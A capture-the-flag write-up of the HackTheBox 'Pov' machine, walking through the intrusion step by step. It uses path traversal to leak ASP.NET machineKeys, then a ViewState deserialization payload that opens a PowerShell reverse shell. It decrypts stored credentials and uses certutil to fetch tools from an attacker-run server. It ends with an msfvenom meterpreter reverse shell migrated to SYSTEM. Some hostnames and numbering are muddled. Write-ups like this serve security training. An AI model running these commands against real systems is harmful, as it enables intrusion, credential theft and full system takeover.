Pov — HackTheBox Seasonal Machine Simple Writeup by Karthikeyan Nagaraj | 2024

Enumeration and Analysis
1.1) Service Enumeration — Nmap
1.2) Directory Enumeration — Gobuster (or) Dirsearch
1.3) Subdomain Enumeration — GobusterInitial Foothold
2.1) Port — 80
2.2) Getting into the Machine
2.3) User.txt — Gaining User AccessPrivilege Escalation
3.1) Root.txt — Gaining Root AccessSimple Video PocConnect to the HackTheBox’s Seasonal Machine’s VPNDownload the resources here — https://github.com/Cyberw1ng/OSCP/tree/main/HackTheBox/PovAdd pov.htb to /etc/hosts using the below command
echo “IP pov.htb” | sudo tee -a /etc/hostsGrab a Coffee and start the process!

1. Service Enumeration — Nmap

Let’s Perform a basic Nmap scan using the below command:
nmap -sC -sV IP

2. Directory Enumeration — Gobuster (or) Dirsearch

Then, perform a Directory Enumeration using the following command dirsearch -u clicker.htb -e*
(or)
gobuster dir -u http://pov.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Nothing Found Interesting

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pov.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 28 / 19967 (0.14%)[ERROR] Get "http://dev.pov.htb/portfolio/":
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished

3. Subdomain Enumeration — Gobuster

Similarly, perform a DNS Enumeration using the following command — gobuster dns -d clicker.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20But Found Nothing Interesting in Scan.

1. Port — 80

On Enumerating http://pov.htb, there is a username and a subdomain http://dev.pov.htb at the FooterLet’s Add that to the Host and Inspect it.There is a File Download Option in http://dev.pov.htb On Intercepting that request, we can see a list of Parameters like below:__EVENTTARGET=download&
__EVENTARGUMENT=&
__VIEWSTATE=DY%2FikU7FyXJZCW0op4Kz6Bgqd4o%2FFtEfEsiowrOTlRKwk96TfCKJt6cwtTy82KRl93H2SNf4FCvmzZuhMaKfKMCbzZg%3D&
__VIEWSTATEGENERATOR=8E0F0FA3&
__EVENTVALIDATION=eGOIJz%2BJA4RbAfYNdIjP%2FXmYDtUaz97UabMUsYu%2Bg8ppRuevK%2FWEufVY9E0M8KqssT57LzrVSlgu%2FzTmjoojoiS270xt9sBSLasZ2CSk2sh4uF3oBk9hMWE%2FILb9D20b1kQDEA%3D%3D
&file=cv.pdf

4. We can try changing the filename cv.pdf to some other sensitive file name. On Changing the filename to /web.config , we get the below response.

<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>

2. User.txt — Getting into the Machine

1. On researching about this, I found a method to exploit this Vulnerability.

2. First, we need to create a payload using the below command
python3 Reverse_Shell_for_Power_Shell.py IP 4444

3. Open your Windows virtual machine, download ysoserial.exe here, cd to that folder, paste the payload in the below syntax, and hit enter

4. Open a Terminal and start a Listener using: nc -lvnp 4444

5. Now click the Download CV in http://dev.pov.htb, capture the request, paste the code that we created in the above step for __VIEWSTATE the parameter, and send the request

6. If you did everything correctly, then you’ll receive a connection.

7. We are in the shell of sfitz . I got an interesting file in the Documents Folder of sfitz which contains the password of the privileged use alaading

PS C:\Users\sfitz\Documents> type connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>

8. Use the below command to fetch that password

echo > pass.txt
$EncryptedString = Get-Content .\pass.txt
$SecureString = ConvertTo-SecureString $EncryptedString
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
echo $Credential.GetNetworkCredential().password

9. Now Download RunasCs.exe, psgetsys.ps1 and EnableAllTokenPrivs.ps1 from here

10. Open Terminal in the Downloaded Folder and type the below command to start http server to transfer files from our machine to Windows.
python3 -m http.server

11. The link of the file will be like http://YOUR_IP:8000/filename

12. Now, use the command below command to download the files in the victim machine

certutil.exe -urlcache -split -f "http://IP:8000/EnableAllTokenPrivs.ps1" ".\EnableAllTokenPrivs.ps1"
certutil.exe -urlcache -split -f "http://IP:8000/psgetsys.ps1" ".\psgetsys.ps1"
certutil.exe -urlcache -split -f "http://IP:8000/RunasCs.exe" ".\RunasCs.exe"

13. Now, start a listener in your machine and type the below command in the victim machine to get into Alaading’s account with the credentials:
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r YOUR_IP:4444

14. Use the below command to view the flag or manually cd into alaading's directory
type C:\Users\alaading\Desktop\user.txt

If we type whoami /priv, we can see that the sedebugPrivilegePoC privilege has been disabled.To Enable the state of this privilege, cd into the directory and execute the script that we downloaded in previous section using the commands
.\psgetsys.ps1
.\EnableAllTokenPrivs.ps1In your machine type the below command to create a Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=5555 -f exe > exploit.exeMove the exploit.exe to the directory that we are hosting the http.server and send the file to the victim machine using the above techniques.Configure the Meterpreter in your machine and run exploit.exe in the victim machine.Type ps and find the PID of winlogon.exeThen type migrate PID_VALUE and after that shellNow, you got the access as nt authority\systemUse the below command to view the flag or manually cd into Administrator’s directory
type C:\Users\Administrator\Desktop\root.txt

10. We got the Admin Flag ~